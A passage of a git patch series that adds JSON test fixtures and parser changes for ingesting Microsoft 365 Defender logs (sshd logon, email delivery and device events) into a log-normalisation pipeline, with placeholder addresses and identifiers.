-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + "-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + "-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + "working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json new file mode 100644 index 000000000..11ca88986 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:40Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "3162398878", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "company.com", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@company.com" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<1@eu-west-1.test.com>", + "subject": "MAIL subject", + "to": { + "address": [ + "alan.smithee@company.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json new file mode 100644 index 000000000..d3b7b8c2f --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "2633942188", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "test.fr", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@test.fr" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<20241028141819.43623347A8F@test.fr>", + "subject": "EMAIL Subject", + "to": { + "address": [ + "alan.smithee@test.fr" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file From 94649a4b22251fe173eb508355223e3f8e67a851 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 12:16:03 +0100 Subject: [PATCH 089/150] Enhanced smart descriptions --- .../_meta/smart-descriptions.json | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 6232e66f8..2d1728daa 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -9,6 +9,17 @@ { "field": "action.type" } ] }, + { + "value": "New {action.type} incident received: {microsoft.defender.investigation.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" }, + { "field": "microsoft.defender.investigation.name" } + ] + }, { "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}", "conditions": [ From 1bb05b973e9cb21fae745b7ce6eabd0f184a55eb Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 13:55:16 +0100 Subject: [PATCH 090/150] Deleted device_events exceptions --- .../microsoft-365-defender/ingest/parser.yml | 4 +- ...test_device_event_sensitive_file_read.json | 81 +++++++++---------- .../tests/test_device_events_2.json | 11 ++- ..._device_events_shell_link_create_file.json | 74 +++++++++-------- .../tests/test_device_process_created.json | 8 +- .../test_devices_events_script_content.json | 11 ++- 6 files changed, 91 insertions(+), 98 deletions(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index f60d9b6f0..0a33f577f 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -41,9 +41,9 @@ pipeline: output_field: "data" - name: set_common_fields - name: set_process_events - filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + filter: '{{json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}' - name: set_process_deviceprocess_events - filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json index fedd99aea..413d002c1 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json @@ -24,18 +24,16 @@ "properties": { "AccountSid": "S-1-2-3", "process": { - "parent": { - "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", - "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "FileSize": 3316224, - "LogonId": "5223047", - "VersionInfoCompanyName": "Test Corporation", - "VersionInfoFileDescription": "Browser EXE", - "VersionInfoInternalFileName": "Browser.EXE", - "VersionInfoOriginalFileName": "Browser.EXE", - "VersionInfoProductName": "Test Product", - "VersionInfoProductVersion": "1, 0, 0, 1" - } + "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "FileSize": 3316224, + "LogonId": "5223047", + "VersionInfoCompanyName": "Test Corporation", + "VersionInfoFileDescription": "Browser EXE", + "VersionInfoInternalFileName": "Browser.EXE", + "VersionInfoOriginalFileName": "Browser.EXE", + "VersionInfoProductName": "Test Product", + "VersionInfoProductVersion": "1, 0, 0, 1" } }, "type": "SensitiveFileRead" @@ -57,37 +55,38 @@ } }, "process": { - "name": "FileName.mdb", + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", "parent": { - "args": [ - "/DBMode", - "/Network", - "/ProjectID", - "/Ticket", - "0", - "0", - "12345678-1234-5678-9012-345678901234", - "123456789" - ], - "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "executable": "c:\\program files (x86)\\browser.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" - }, - "name": "browser.exe", - "pid": 1328, - "start": "2024-11-12T10:17:23.990532Z", - "user": { - "domain": "company", - "email": "USERNAME@COMPANY.COM", - "id": "S-1-2-3", - "name": "username" - }, - "working_directory": "c:\\program files (x86)" + "name": "Windows.exe", + "pid": 1820, + "start": "2024-10-14T05:47:54.324381Z" + }, + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" }, - "working_directory": "C:" + "working_directory": "c:\\program files (x86)" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 494baa569..4964dae1f 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json @@ -17,9 +17,7 @@ "action": { "properties": { "process": { - "parent": { - "LogonId": "0" - } + "LogonId": "0" } }, "type": "ScriptContent" @@ -42,9 +40,10 @@ }, "process": { "parent": { - "pid": 417271, - "start": "2024-10-22T15:09:08.624070Z" - } + "pid": 0 + }, + "pid": 417271, + "start": "2024-10-22T15:09:08.624070Z" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json index 37a646715..48696c644 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json @@ -23,18 +23,16 @@ "action": { "properties": { "process": { - "parent": { - "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", - "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "FileSize": 1621656, - "LogonId": "8066492", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Word", - "VersionInfoInternalFileName": "WinWord", - "VersionInfoOriginalFileName": "WinWord.exe", - "VersionInfoProductName": "Microsoft Office", - "VersionInfoProductVersion": "16.0.17928.20216" - } + "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "FileSize": 1621656, + "LogonId": "8066492", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Word", + "VersionInfoInternalFileName": "WinWord", + "VersionInfoOriginalFileName": "WinWord.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.17928.20216" } }, "type": "ShellLinkCreateFileEvent" @@ -60,34 +58,34 @@ } }, "process": { - "name": "FILENAME.LNK", + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", "parent": { - "args": [ - "\"\"", - "\"I:\\COMPANY\\Service\\FILE.doc\"", - "/n", - "/o" - ], - "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" - }, - "name": "winword.exe", - "pid": 20948, - "start": "2024-11-12T10:02:28.777910Z", - "user": { - "domain": "company", - 